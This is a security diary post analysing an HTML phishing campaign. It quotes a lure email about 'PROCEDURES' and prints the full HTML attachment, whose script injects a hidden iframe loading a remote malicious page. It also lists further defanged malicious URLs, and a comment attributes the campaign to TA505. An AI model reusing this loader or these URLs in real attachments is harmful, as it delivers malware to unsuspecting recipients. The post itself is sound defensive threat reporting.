HTML based Phishing Run

Published: 2020-06-15
Last Updated: 2020-06-15 16:14:38 UTC
by Rick Wanner (Version: 1)
2 comment(s)

An intresting phishing run started over the weekend.  At first glance it looks pretty typical...a clumsy email with an attachment with some vital and useful information.  Although I have already seen several different message bodies, this is one sample:

Sent:Friday, June 12, 2020 10:16 AM
To:jsoulesneu@creationtech.com
Subject:PROCEDURES

Please find attached a copy of current procedures in place for:

Bank
Concur PO & Expenses processing
Raising Sales Invoices
Raising Purchase Invoices
Recording Consolidated AR & AP at Month End.

I am also working on a Customer spreadsheet (expanding on records held previously ) recording :
Revenue Type
Invoice Frequency
Unit Price
Is a PO required ? if so what type.
I thought that this would be useful if coding and dimensions were included.

Jane Edwards | LedgerController

The attachment in this case was an html file called PROCEDURES.html containing the following:

<div style="display:none;">
aJvpegSAIsclHZNi1NyrFqPLeMlOyw88A56gWJWLi61ta4nysJL5YyCS4SkB5ecmueTM3HurZViJzvLkyWvXTcjcBmmeyvQe4O96jKEUotfdq3tHhaciSnBr5QkPuq3DeeOTvPaXrJIz7gVI3N7xtIuPnRbBzXz8AK8lnJlBaoZiObuY5LWQtEkES9GNNHxCkJ9vhJutBExfSlbmwmGXbSO5ACBocHWCZx8eb8QvqDoXheVG7uqBbIBA5d5Ohgq4R5oun7kyEkHGDZXvP4qRquBq5Gi7dcnjnufmYAtaj27Zb47epI8nYIMxC7zPXmvC7xtiUKFoKqHyxKpaIeRDd9uORRS2bMl7GD2NKYtNdSMIan91RygTE1y7dOAc2Nm7eK23SLzTTdztwUNDS1jMGBBOe4K6xqVyGPEyvfig9v9AAfJra6taEJALimYXaCvCrbWQqoiMScNkBbn9ts6B7U47o2qiqufF9Fizr3bUWPr
<a>

PACqCf9SoOoQ97h8rQAEYrnA7B42xxXGW8HMB6ibNI8UNKjnwpn5ZDtynbtbkgvZ1Q3ayDGvHz1psBWvrQFhj2QtOjyzLhZHmh36QiY2S2wzMdfVo7SDJoP
</a>
</div>
<div id="placeholder"></div>

<script id="iframeTemplate" type="text/html">
    <iframe style="width: 100%; height: 100%; border: 0px" src="http://www.wessexgrange.plus.com/7cdmba.html">

</iframe>
</script>

<script type="text/javascript">
var element,
    html,
    template;

element = document.getElementById("placeholder");
template = document.getElementById("iframeTemplate");
html = template.innerHTML;

element.innerHTML = html;
</script>
<div style="display:none;">
{{RND_TEXT}}
</div>

With assistance from reader Carsten I was also able to get a number of the other URLs used in these messages.

hxxp://bosmafamily.nl/~jet/bzkh.html 
hxxp://flbox.net/87nbtp.html
hxxp://werinussa.net/~eege/1kf2zw.html
hxxp://www.chartercare.plus.com/zlw7.html
hxxp://www.wessexgrange.plus.com/7cdmba.html - Down

There are some detections on the attachments, but Virustotal has almost no detections for the websites. Interestingly Sophos antivirus is listed as "Unrated" on VirusTotal, but my Sophos test machine is catching the attachments as Troj/HTMLDwn-UA.

Running a few of these domains through urlscan.io, it appears very similar and most likely related web pages have been around for at least a week.

So far this is looking like a very clumsy campaign.  But if past history tells us anything these clumsy campaigns will sometimes get better and cause some chaos.  So it is worth keeping an eye on.

If anybody has any more details, they would be greatly appreciated. I would be especially interested in getting my hands on a couple more samples of the attachments. If you have access to some, I would appreciated it if you could zip up a few (password 'infected') and send them to me via the contact form.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Keywords: HTML Phishing
2 comment(s)

Comments

I've been seeing a lot of phishing emails coming in with HTML attachments, but none of them using the iframe method. I've now setup a filter for HTML attachments to resolve the issue. Let me know if you would like any of them, otherwise I will keep an eye out for ones that use iframes in them.
I believe this is from the TA505 campaign on June 12th. I recognize that PROCEDURES.html file and 4/5 phishing URLs. They came from a variety of compromised senders, used these phishing links to direct to recently registered domains to download a maldoc that asks to "Enable Content". The maldoc tries to reach out to TA505 controlled domains and apparently download Get2 (which I cannot confirm as I only saw the maldoc reach out to the domain and never received the payload). See the blog below for a good write-up on what the final payload does and the goal of these phishing emails (ransomware). You may also want to check out #TA505 on twitter for some sample maldocs and the payload domains for different waves.

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

Diary Archives